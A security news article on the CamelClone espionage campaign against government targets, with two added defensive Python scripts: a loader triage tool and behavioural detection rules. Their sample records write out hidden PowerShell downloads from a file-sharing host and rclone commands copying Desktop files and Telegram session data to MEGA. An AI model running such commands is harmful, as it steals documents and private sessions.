CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks

A sophisticated espionage campaign, tracked as Operation CamelClone, has been actively targeting government agencies, defense institutions, and diplomatic bodies across multiple countries, including Algeria, Mongolia, Ukraine, and Kuwait.

The operation relies on spear-phishing emails carrying malicious ZIP archives disguised as official government correspondence, tricking recipients into triggering a multi-stage infection chain that ultimately leads to data theft using a legitimate cloud transfer tool.

The campaign first surfaced in late February 2026, when a suspicious ZIP file named after Algeria’s Ministry of Housing, Urban Development, and the City was spotted on VirusTotal, uploaded from Algeria on February 24.

Shortly after, a second sample emerged, targeting Mongolia with a lure themed around “Expanding cooperation with China.”

As March progressed, two more samples surfaced — one referencing Algerian-Ukrainian cooperation proposals and another targeting Kuwait’s Air Force with a defense procurement decoy — confirming the campaign’s wide geographic reach.

Seqrite analysts identified the full scope of Operation CamelClone and noted that while the target countries may seem unconnected, each sits at a critical point in the current global geopolitical landscape.

Ukraine remains at the center of an active armed conflict, Algeria plays a key role in European and African energy politics, Mongolia is navigating tensions between China, Russia, and Western partners, and Kuwait is a strategic Gulf defense partner.

The attackers appear to have carefully selected their targets based on intelligence value rather than financial motivation.

The campaign’s attack vector is consistent across all observed samples. Each ZIP archive contains a Windows shortcut (LNK) file alongside a convincing decoy image bearing an official government logo — the Algerian Ministry’s seal, Mongolia’s MonAtom LLC emblem, or the Kuwait Armed Forces crest.

Decoy Lure Images Used Across CamelClone Campaigns (Source - Seqrite)

Once the victim opens the shortcut, a hidden PowerShell command executes silently in the background, pulling the next stage of the attack from an anonymous public file-sharing platform.

What makes this operation particularly difficult to detect is the complete absence of dedicated command-and-control servers.

Instead, the attackers host all their malicious payloads on filebulldogs[.]com, a public file-sharing site, and route stolen data through MEGA cloud storage.

This approach effectively blends malicious traffic with ordinary internet activity, making detection through standard network monitoring significantly harder.

Inside the Infection Chain

Once the shortcut file runs, a PowerShell command downloads a JavaScript file named f.js from filebulldogs[.]com and executes it immediately.

Infection chain (Source - Seqrite)

This loader, which Seqrite researchers track under the name HOPPINGANT, is a Windows Script Host JavaScript that runs two Base64-encoded PowerShell commands to carry out further malicious activity.

HOPPINGANT Loader Execution Flow (Source - Seqrite)

These commands first download a null-padded decoy PDF to distract the victim, then pull a ZIP archive named a.zip containing a portable copy of Rclone, a legitimate open-source cloud file transfer tool, at version 1.70.3.

After extracting Rclone, the script decodes a stored password by XORing each byte with the single-byte key 56 (0x38), then runs Rclone with it to log into a MEGA account registered under an anonymous onionmail.org email address.
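The loader's structure (two Base64-encoded PowerShell stages, a download URL in each, and a password stored as XOR-obfuscated bytes) is simple enough to triage statically. The script below is an added example written for this page, not Seqrite's tooling or anything recovered from the campaign: it decodes the Base64 stages of a captured script body, lists the URLs they contact, and reverses the single-byte XOR with key 56. The SAMPLE it runs on is constructed to mirror the loader's shape; the domain filebulldogs.example, the stage contents, the `$k`/`$pw` variable names and the recovered password are all stand-ins, and the UTF-16LE-versus-UTF-8 heuristic in `decode_ps_blob` is an assumption about how the blobs are encoded.

```python
"""Static triage of a HOPPINGANT-style loader (added example, not Seqrite's code).

The loader is a WSH JavaScript that runs two Base64-encoded PowerShell
commands; the second stage XOR-decodes a stored MEGA password with key 56.
This helper pulls those pieces out of a captured script body without
executing anything.  SAMPLE below is constructed to mirror that structure:
the domain, stage contents and password are stand-ins, not campaign IOCs.
"""
import base64
import binascii
import re

XOR_KEY = 56  # single-byte key reported for the stored MEGA password

# A run of Base64 text long enough to be a payload rather than an identifier.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# A PowerShell byte array of eight or more small integers, e.g. @(123,84,...).
BYTE_ARRAY_RE = re.compile(r"@\(\s*(\d{1,3}(?:\s*,\s*\d{1,3}){7,})\s*\)")


def decode_ps_blob(blob):
    """Decode one Base64 PowerShell payload to text.

    -EncodedCommand carries UTF-16LE; a FromBase64String() call inside a
    script usually carries UTF-8.  Assumption: treat the bytes as UTF-16LE
    when every odd byte is NUL (ASCII text), otherwise as UTF-8.
    """
    raw = base64.b64decode(blob)
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def xor_decode(data, key=XOR_KEY):
    """Undo the single-byte XOR the script applies to the stored password."""
    return bytes(b ^ key for b in data).decode("ascii", errors="replace")


def triage(script_text):
    """Return decoded stages, the URLs they contact and any XOR-recovered secrets."""
    stages = []
    for m in B64_RE.finditer(script_text):
        try:
            stages.append(decode_ps_blob(m.group(0)))
        except (binascii.Error, ValueError):
            continue  # long token that is not valid Base64
    urls = sorted({u for s in stages for u in URL_RE.findall(s)})
    secrets = []
    for s in stages:
        for m in BYTE_ARRAY_RE.finditer(s):
            raw = bytes(int(n) for n in m.group(1).split(","))
            secrets.append(xor_decode(raw))
    return {"stages": stages, "urls": urls, "secrets": secrets}


def encode_ps_blob(ps):
    """Build a -EncodedCommand style blob (used only to construct the sample)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# --- constructed sample mirroring the loader's shape (not the real f.js) ---
STAGE1 = (r"Invoke-WebRequest -Uri https://filebulldogs.example/d.pdf "
          r"-OutFile $env:TEMP\d.pdf; Start-Process $env:TEMP\d.pdf")
STAGE2 = (r"Invoke-WebRequest -Uri https://filebulldogs.example/a.zip "
          r"-OutFile $env:TEMP\a.zip; Expand-Archive $env:TEMP\a.zip $env:TEMP\r; "
          r"$k=@(123,84,8,77,92,21,125,64,94,81,84,21,10,8,10,14); "
          r"$pw=-join($k|%{[char]($_ -bxor 56)})")
SAMPLE = ("var sh = new ActiveXObject('WScript.Shell');\n"
          "sh.Run('powershell -w hidden -enc " + encode_ps_blob(STAGE1) + "', 0, true);\n"
          "sh.Run('powershell -w hidden -enc " + encode_ps_blob(STAGE2) + "', 0, true);\n")

if __name__ == "__main__":
    result = triage(SAMPLE)
    for url in result["urls"]:
        print("contacts:", url)
    for secret in result["secrets"]:
        print("recovered secret:", secret)
```

Run against a real capture, replace SAMPLE with the text of the downloaded script; the byte-array pattern is the part most likely to need adjusting, since a different build of the loader may store the obfuscated password as a string rather than an integer array.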

With the connection established, the tool sweeps the victim’s Desktop for .doc, .docx, .pdf, and .txt files and uploads them directly to the attacker’s storage.

The script also targets Telegram session data from the Telegram Desktop tdata directory, potentially giving the attacker access to private conversations. Four unique MEGA accounts were identified across all campaigns, all registered in February and March 2026.

Organizations in government, defense, and diplomatic sectors should treat unsolicited ZIP files with great caution, especially those referencing official institutions or defense partnerships.

Blocking access to anonymous file-sharing platforms and monitoring outbound traffic to cloud storage services like MEGA can limit exposure.

Restricting LNK file execution from untrusted sources and deploying behavior-based endpoint detection tools can help stop the PowerShell and JavaScript-based execution chain before it completes.
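Because the chain uses no dedicated C2, the most reliable signal is its process lineage rather than any one hash or IP: Explorer launching a hidden PowerShell download, wscript.exe running a .js from a temp path, that script host spawning Base64-encoded PowerShell, and a portable rclone.exe pushing Desktop documents or Telegram tdata to a MEGA remote. The rules below are an added example written for this page, not a Seqrite or vendor rule set, run over constructed records shaped like Sysmon process-creation and DNS events. The only indicator taken from the report is the defanged filebulldogs[.]com hostname; user names, paths, the Base64 blob and the rclone command lines are stand-ins, and the regexes for rclone's MEGA remote syntax are an assumption about how the attacker invokes the tool.

```python
"""Behavioural rules for the CamelClone execution chain (added example, not a
vendor rule set).

Runs over process-creation and DNS records shaped like Sysmon Event ID 1 / 22
fields.  The rules key on the chain's shape rather than on hashes, so a
renamed payload still triggers them.  EVENTS is a constructed sample; user
names, paths, the Base64 blob and the rclone command lines are stand-ins.
"""
import re

# Anonymous file-sharing host named in the report, stored defanged and
# refanged at load time so the source never carries a live hostname.
FILE_SHARING_HOSTS = {h.replace("[.]", ".") for h in ("filebulldogs[.]com",)}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(Downloads|AppData\\Local\\Temp|Temp|Public)\\", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
WEB_DOWNLOAD = re.compile(
    r"\b(?:iwr|Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer|curl)\b", re.I)
MEGA_REMOTE = re.compile(r"\bmega:|\bmega\.nz\b|--mega-", re.I)  # assumed rclone 'mega' remote syntax
TELEGRAM_TDATA = re.compile(r"Telegram Desktop\\tdata", re.I)
DESKTOP_SOURCE = re.compile(r"\\Desktop\b", re.I)
JS_ARG = re.compile(r"\.js\"?\s*$", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rules_for(ev):
    """Return the names of every rule the event satisfies (empty if benign)."""
    hits = []
    if ev["type"] == "dns":
        if ev["query"].lower().rstrip(".") in FILE_SHARING_HOSTS:
            hits.append("dns_anonymous_file_sharing")
        return hits
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    if image == "powershell.exe":
        # Stage 0: the LNK runs under Explorer, so the shortcut's hidden
        # PowerShell download shows up as explorer.exe -> powershell.exe.
        if parent == "explorer.exe" and HIDDEN_WINDOW.search(cmd) and WEB_DOWNLOAD.search(cmd):
            hits.append("shortcut_hidden_powershell_download")
        # Stage 1: the WSH loader launching Base64-encoded PowerShell.
        if parent in SCRIPT_HOSTS and ENCODED_CMD.search(cmd):
            hits.append("wsh_spawns_encoded_powershell")
    if image in SCRIPT_HOSTS and JS_ARG.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("wsh_script_from_user_writable_path")
    # Stage 2: rclone that was dropped in a user path or talks to a MEGA remote.
    if image == "rclone.exe" and (MEGA_REMOTE.search(cmd) or USER_WRITABLE.search(ev["image"])):
        hits.append("rclone_cloud_transfer_suspicious")
        if DESKTOP_SOURCE.search(cmd):
            hits.append("rclone_desktop_sweep")
    if TELEGRAM_TDATA.search(cmd) and image != "telegram.exe":
        hits.append("telegram_session_access")
    return hits


def scan(events):
    """Return (index, rule names) for every event that matched at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := rules_for(ev))]


# --- constructed sample; the last two records are benign and must not match ---
HOST = next(iter(FILE_SHARING_HOSTS))
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\ann\AppData\Local\Temp"
EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell.exe -w hidden -c "iwr https://' + HOST
                + r'/f.js -OutFile $env:TEMP\f.js; wscript $env:TEMP\f.js"'},
    {"type": "dns", "image": PS, "query": HOST},
    {"type": "process", "parent": PS, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript " + TEMP + r"\f.js"},
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe", "image": PS,
     "cmdline": "powershell -w hidden -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA=="},
    {"type": "process", "parent": PS, "image": TEMP + r"\r\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Users\ann\Desktop mega:docs --include *.doc "
                r"--include *.docx --include *.pdf --include *.txt"},
    {"type": "process", "parent": PS, "image": TEMP + r"\r\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Users\ann\AppData\Roaming\Telegram Desktop\tdata mega:tg"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"type": "process", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r"rclone.exe sync D:\backup onedrive:backup"},
]

if __name__ == "__main__":
    for index, names in scan(EVENTS):
        print(index, ", ".join(names))
```

The two benign records at the end are the point of the design: a scheduled PowerShell script launched from Explorer and a system-installed rclone syncing to a sanctioned remote match nothing, because every rule requires either the hidden-window/encoded flags, a user-writable path, or the MEGA remote in addition to the process name. Tune USER_WRITABLE and the remote regex to the environment before deploying anything like this at scale.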

The post CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks appeared first on Cyber Security News.
